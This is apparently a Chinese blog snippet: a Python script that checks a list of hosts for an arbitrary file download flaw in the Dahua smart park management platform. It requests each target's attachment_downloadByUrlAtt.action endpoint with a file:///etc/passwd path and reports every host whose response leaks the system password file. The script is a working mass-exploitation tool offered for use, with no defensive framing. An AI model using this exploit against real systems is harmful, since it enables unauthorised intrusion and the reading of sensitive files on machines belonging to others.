# -*-coding:utf-8 -*-
import time
import requests
i = 1
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"}
with open("url.txt", "r") as file:
for line in file:
line = line.replace('\n', '')
payload = f"{line}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"
try:
response = requests.get(url=payload, headers=headers, timeout=3)
if 'root:' in response.text:
print(f"{i}:{line}存在任意文件下载漏洞")
else:
print(f"{i}:{line}不存在漏洞")
except:
print(f"{i}:{line}请求超时")
i += 1
time.sleep(0.5)
大华智慧园区综合管理平台任意文件下载
最新推荐文章于 2024-02-01 16:02:36 发布